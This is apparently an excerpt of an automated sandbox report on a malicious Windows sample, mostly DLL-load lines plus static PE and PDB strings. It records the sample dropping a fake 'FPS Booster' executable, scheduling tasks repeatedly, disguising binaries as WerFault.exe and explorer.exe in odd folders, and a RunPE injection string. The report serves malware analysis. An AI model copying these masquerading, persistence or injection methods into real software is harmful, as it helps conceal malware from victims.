Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Section loaded: dnsapi.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: mscoree.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: apphelp.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: version.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: rsaenh.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: mscoree.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: apphelp.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: version.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: uxtheme.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: sspicli.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: windows.storage.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: wldp.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: profapi.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: cryptsp.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: rsaenh.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: cryptbase.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: mscoree.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: version.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: uxtheme.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: sspicli.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: windows.storage.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: wldp.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: profapi.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: cryptsp.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: rsaenh.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: cryptbase.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: amsi.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: userenv.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: rasapi32.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: rasman.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: rtutils.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: mswsock.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: winhttp.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Section loaded: dnsapi.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: mscoree.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: version.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: windows.storage.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: rsaenh.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: amsi.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: userenv.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: rasapi32.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: rasman.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: rtutils.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\regedit\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\UNFOT5F1qt.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Directory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Directory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\e7d19d53a5ec77aafa68c9a929149b118506bb42
Source: UNFOT5F1qt.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: UNFOT5F1qt.exe | Static file information: File size 1131531 > 1048576
Source: UNFOT5F1qt.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: UNFOT5F1qt.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdbRSDS source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdb2e source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdb1qt.PDB source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000BE5000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbx source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: RunPE_MemoryProtection.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: HPOo`C:\Windows\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualStudio.Threading.pdbpdbing.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdbpdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Core.ni.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: System.Core.pdbPSp source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: ?[oC:\Users\user\Desktop\Microsoft.VisualStudio.Threading.pdbJ source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: mscorlib.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: symbols\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualStudio.Threading.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbs source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbS source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb97` source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdbXX@ source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C41000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbLLt source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: @[o.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER2082.tmp.dmp.6.dr
